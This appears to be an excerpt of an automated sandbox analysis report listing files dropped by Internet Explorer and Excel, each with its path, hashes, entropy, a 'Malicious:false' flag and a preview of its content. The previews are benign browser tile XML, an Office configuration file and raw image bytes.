                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xbb28b8a6,0x01d74044</date><accdate>0xbb28b8a6,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xbb28b8a6,0x01d74044</date><accdate>0xbb2d7d58,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):653
                                                                                                                                                                            Entropy (8bit):5.119497405990879
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:TMHdNMNxe2kJwJwbnWimI002EtM3MHdNMNxe2kJwJwbnWimI00OYGkak6EtMb:2d6NxrqKWSZHKd6NxrqKWSZ7Yza7b
                                                                                                                                                                            MD5:BD5A9A07CBFBA3C26F4861C01EB5CECD
                                                                                                                                                                            SHA1:4244E4677BB2185AC5EFDD34738598033CA39599
                                                                                                                                                                            SHA-256:DA84C4F4657DF753818487CDA6415EFC76CE75808F577D135A0126CC5BA14FEF
                                                                                                                                                                            SHA-512:5C9BF8CE62A8D48C4FCCC5A1922F5DAD60E104D415D76EA11F4E1EEA9A6AE7BB59D10595DE75600E85F6FB3DA8001B2550CCC5A81C1DF1D93ADD570F9C7AFA56
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xbb1f2f2f,0x01d74044</date><accdate>0xbb1f2f2f,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xbb1f2f2f,0x01d74044</date><accdate>0xbb1f2f2f,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):662
                                                                                                                                                                            Entropy (8bit):5.127257186913745
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:TMHdNMNxvLsUCUZnWimI002EtM3MHdNMNxvLsUCUZnWimI00OYGmZEtMb:2d6NxvPSZHKd6NxvPSZ7Yjb
                                                                                                                                                                            MD5:8BE9456692048E2904892A4A3A398402
                                                                                                                                                                            SHA1:31173BEA7AE5AEDC650DD64DD3BCEE5C1EF6E556
                                                                                                                                                                            SHA-256:061150D63F4F443E67D2F4E0B447AFAA9F251955CA1566C2498A185DD474537C
                                                                                                                                                                            SHA-512:E97351BC09C7575DD77C5DF3A435AA0EA8A829F93200565119573F2E9BFC086D764D606EF27B0BEF722A11A083458043DAE7A49CB7AE0844B79FC801322DC957
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xbb2d7d58,0x01d74044</date><accdate>0xbb2d7d58,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xbb2d7d58,0x01d74044</date><accdate>0xbb2d7d58,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):647
                                                                                                                                                                            Entropy (8bit):5.14773887520185
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:TMHdNMNxipEpEbnWimI002EtM3MHdNMNxipEpEbnWimI00OYGd5EtMb:2d6NxWQCSZHKd6NxWQCSZ7YEjb
                                                                                                                                                                            MD5:9D34745A3931E1C93AA1B00E99989C36
                                                                                                                                                                            SHA1:84D97466C1DD799BEA87831A70E54DC3F1FCDFDF
                                                                                                                                                                            SHA-256:AB08F9F00E9E3A8B9E5C4036631E814680F2C12DD4D2238B2E6B66CA6CB01AF5
                                                                                                                                                                            SHA-512:9DB746D074F67473DCFE29C156C1297016592A45C909157BDA99D6B7CBCFA217942B2AF04187ECB1E758804C7156A03D92774B79BB3A7BF2D3EA9FFD82124DF6
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xbb265666,0x01d74044</date><accdate>0xbb265666,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xbb265666,0x01d74044</date><accdate>0xbb265666,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):656
                                                                                                                                                                            Entropy (8bit):5.1378498359506235
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:TMHdNMNxhGwsUCUZnWimI002EtM3MHdNMNxhGwsUCUZnWimI00OYG8K075EtMb:2d6NxQaSZHKd6NxQaSZ7YrKajb
                                                                                                                                                                            MD5:40F8C4EBCA3FC2A4B507051438F549B7
                                                                                                                                                                            SHA1:72DC1055269DE2E8D6A04BC11558712DA953D200
                                                                                                                                                                            SHA-256:4C016C5D7F404728A8C141BE7D36E70571BCE6B42875C2D2D34769674AE5E8DC
                                                                                                                                                                            SHA-512:BBCAE449361A239CAB1256E00D724DDE968749ACDB621FFF644B5EDF2DB5616FF53776614A3D9F3704686AFB46648D9D1954DD685F02069707B035A6A89A4D08
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xbb2d7d58,0x01d74044</date><accdate>0xbb2d7d58,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xbb2d7d58,0x01d74044</date><accdate>0xbb2d7d58,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):653
                                                                                                                                                                            Entropy (8bit):5.1239176019668475
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:TMHdNMNx0n5A5AbnWimI002EtM3MHdNMNx0n5A5AbnWimI00OYGxEtMb:2d6Nx056mSZHKd6Nx056mSZ7Ygb
                                                                                                                                                                            MD5:31B0EC24F336AA5243C544D25BF8765D
                                                                                                                                                                            SHA1:9F36941F9E755FAB69A0CA18D1DD9CA850257D81
                                                                                                                                                                            SHA-256:C203319D1BCF6727D6ED02F5EFC8320E6EA019A95EFFF4F0691A5F4881B0E50A
                                                                                                                                                                            SHA-512:CACA04D59864E9012A3CBB42CFAEBEE8C7CB6077D623DB6EB73EEBE0FE4E64170BF00AD075A7AB2F573432BB31BE392858E3761037F85102F66FDEEE66D0BBA7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xbb28b8a6,0x01d74044</date><accdate>0xbb28b8a6,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xbb28b8a6,0x01d74044</date><accdate>0xbb28b8a6,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):656
                                                                                                                                                                            Entropy (8bit):5.175254502787159
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:TMHdNMNxxpEpEbnWimI002EtM3MHdNMNxxpE5AbnWimI00OYG6Kq5EtMb:2d6NxfQCSZHKd6Nxf2mSZ7Yhb
                                                                                                                                                                            MD5:12DA374ACDECCFE8A013040E1F7B6738
                                                                                                                                                                            SHA1:AC28F2E667C79DF7D5CAE5C399FC572944A605F7
                                                                                                                                                                            SHA-256:5C742BE846E97C16EBDB23180BA5C4249567838C45FEE160BB79FD1F4B9EBF7D
                                                                                                                                                                            SHA-512:C23DA6F0E35CBC3F2C8688CC6D5BB1A38FA852A6DEEA78446C08F7DC048EF95C78D477D208E07897DF2A5B5805C6AF27FD5D351645CC10F03F684B81EF650481
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xbb265666,0x01d74044</date><accdate>0xbb265666,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xbb265666,0x01d74044</date><accdate>0xbb28b8a6,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):659
                                                                                                                                                                            Entropy (8bit):5.133384812047998
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:TMHdNMNxcI+I+bnWimI002EtM3MHdNMNxcI+I+bnWimI00OYGVEtMb:2d6NxnVASZHKd6NxnVASZ7Ykb
                                                                                                                                                                            MD5:2F81131A4E5445898771BB1F1A18C9E9
                                                                                                                                                                            SHA1:AD2E6BAF73817D527131352523A5F2E6B89BB2B5
                                                                                                                                                                            SHA-256:11C183D066173DB314F92A8A7325E3A46BF018BEEA1A3032A1EB94347DF7933E
                                                                                                                                                                            SHA-512:59D49FCFBE81D099518EB02BADE7E89F9B4739198EC728C36AC9B62DE9785ADDC9F3D47535518EDFF8C22324FFB0EC54110A2F3557E572F21B17C3BADC708913
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xbb2191a6,0x01d74044</date><accdate>0xbb2191a6,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xbb2191a6,0x01d74044</date><accdate>0xbb2191a6,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):653
                                                                                                                                                                            Entropy (8bit):5.086648193991206
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:TMHdNMNxfnNrgrenWimI002EtM3MHdNMNxfnNrgrenWimI00OYGe5EtMb:2d6NxtYeSZHKd6NxtYeSZ7YLjb
                                                                                                                                                                            MD5:F1234F7F79B7D9E31F8B6C63025E3811
                                                                                                                                                                            SHA1:5FD9C33C7A8EF9EBCB3F7F63EB0ABA654C377E59
                                                                                                                                                                            SHA-256:9B466C4AE3A7036C9CFCA5B93A06D99C5A4A1B3C943BB179F1A8BFF61316B99A
                                                                                                                                                                            SHA-512:B8342524CAB80AF233C3F9AF011AA0249CFCFABA6EAE5C07AA6C3869CE153BB87DC962123F5CD13FD361C40B75F65D540C8CCDB5C4D4213886E74AEED20CC8AC
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xbb23f41e,0x01d74044</date><accdate>0xbb23f41e,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xbb23f41e,0x01d74044</date><accdate>0xbb23f41e,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\51B28365-1D64-4B17-A13C-644DC8E32C4F
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):134558
                                                                                                                                                                            Entropy (8bit):5.368402225187978
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:DcQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:wEQ9DQW+zPXO8
                                                                                                                                                                            MD5:826DEAE5CC5E9B0F3D6A5B790FEAA3A6
                                                                                                                                                                            SHA1:A07FBB28E0049DB2F2CE7B3112333030A4D2F070
                                                                                                                                                                            SHA-256:4EC91949EC3CCE465438CC54E576392E6FEB4E606AFFE72B9193E1F417F41DF2
                                                                                                                                                                            SHA-512:6875CAF0AC6CE48A3C62DE975F2F9FF813E18BDD38B55B033C78A3F932171573B4941641F3D65C337AC085B8945E5A6A998EDB74248A9F4224BAD57CE7EBEC78
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-03T17:48:11">.. Build: 16.0.14028.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\633836DC.png
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:PNG image data, 240 x 52, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):7197
                                                                                                                                                                            Entropy (8bit):7.964447218948388
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:DTUaFds32VHjg5vCBadV58kJ+hX5Y+BXj:D4csOjg5qBadV5n0HY+Vj
                                                                                                                                                                            MD5:D4E702617A12082888A2FD8BB0A2A8AC
                                                                                                                                                                            SHA1:7F3A85C42B1B6814E3F32AD579BE8DF4CFF825B3
                                                                                                                                                                            SHA-256:94102F2D952184B98AF8F0459D6B98AE55CD9D1F445F0EA15A4163A6ED3E3579
                                                                                                                                                                            SHA-512:DE6C3865F994D8A4332CD7F1CE8398FBE37F17E7B7EB650E271D60A832AC1B3FA98C96EDDB6CE6E353876FE7976C4C8FC64E6D724ADB22971F8D3E2290B35942
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .PNG........IHDR.......4......,.0....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^..|.......IH!..@...D.S.....I.......H.....>....]....(W.H..{.....-..}S....9..f.l .3:.|.;.3g...;..&...a....F...F.........4.\or7..3N..{..yt....A.....h..#g,$.....|&.....Ka....YPh.O.\::..............,...[y;~....t.....N0j.:::U.].ut.0....Tat........S...XG.!...I........3...M........=...8..W.".F.....k.....K...........S...I&..rsM".G....t.CJ.P.db..Hy.7..u....J?K3.?C..j.meRH..wh\.]T..Qm[.8..,.=z.\\.~.F.L..].u....j[.}{.........n}A~....K...m)b.O.h......N~...W/z...:U......_@.nn...C...g..........A.d....X#..u.c'..e.e.k7m....>...`.5...8P.<;w..i{.....w..h....*....-....h{.....MK...<<=....^X.{.....I..l+.........7.......I!5j.}.)5%U....0f...o..`..p..,b..M...D....=<$.......:.v6n.H).....8=-........4`..j.).]\.wk...(>..........n,<.q.t...m...j......h`G.]..t|X...........Id..V.'~.X222.M.v..S....o.~4...P..}..XbX.....;....-Y...1...]...7.c...k[*..w..;le=*$.=z>..
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\AC906D1E.png
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):557
                                                                                                                                                                            Entropy (8bit):7.343009301479381
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                                                                                                                                                                            MD5:A516B6CB784827C6BDE58BC9D341C1BD
                                                                                                                                                                            SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                                                                                                                                                                            SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                                                                                                                                                                            SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\B005EF51.png
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):8301
                                                                                                                                                                            Entropy (8bit):7.970711494690041
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
                                                                                                                                                                            MD5:D8574C9CC4123EF67C8B600850BE52EE
                                                                                                                                                                            SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
                                                                                                                                                                            SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
                                                                                                                                                                            SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CB32712D.jpeg
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 169x94, frames 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):9501
                                                                                                                                                                            Entropy (8bit):7.860089169273678
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:aiPAPhNxkAEDE7NsNUlIP252RcxPmvynLdpb0aHhh4mbLD1nvSdIz:aioPh4AmNUf2axeCBx0gh4mtSdIz
                                                                                                                                                                            MD5:D07199047FEA546752A9193766EC22C8
                                                                                                                                                                            SHA1:B7AF4CBD8D8ABD6EBB51F5A2E6F2F42B49802FDF
                                                                                                                                                                            SHA-256:F9372424D6940099390601A593A2E623AD8F04D575D298686A9D92B53B1C3A98
                                                                                                                                                                            SHA-512:8FA1F3E47C116058C08C97EA47CC813630AFF4EA442C8185BB253118F9B0DD80E197FFDAE9F01D83A8216F5AC2D2FC139435A2BFFE628AA99C1AE8BEBDC9A8B2
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: ......JFIF.............C....................................................................C.......................................................................^...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(....J..#v...5GR.,..).=J.;xm.g..i.$h.K3....O../...../..bO.|&.....-...'.ff`.O...!......).....L.i.E..{}..+...F.$.n..n.....+....F|.......G.../f...h....;cW`.6..$._......_.P.|..x"?......a..I......0{..:K.1$...8]o._.n>...v......M....y...p..y....fy'.<.q.rOJ......E>....kD..Y.?.+a(...Z/T.............>...|Q.i.6...._&.\.m2^4$.........c... ~..7.m'.?...I&.
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F6BD7E87.png
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):848
                                                                                                                                                                            Entropy (8bit):7.595467031611744
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                                                                                                                                            MD5:02DB1068B56D3FD907241C2F3240F849
                                                                                                                                                                            SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                                                                                                                                            SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                                                                                                                                            SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\background_gradient[1]
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):453
                                                                                                                                                                            Entropy (8bit):5.019973044227213
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
                                                                                                                                                                            MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                                                            SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                                                            SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                                                            SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                                                            Malicious:false
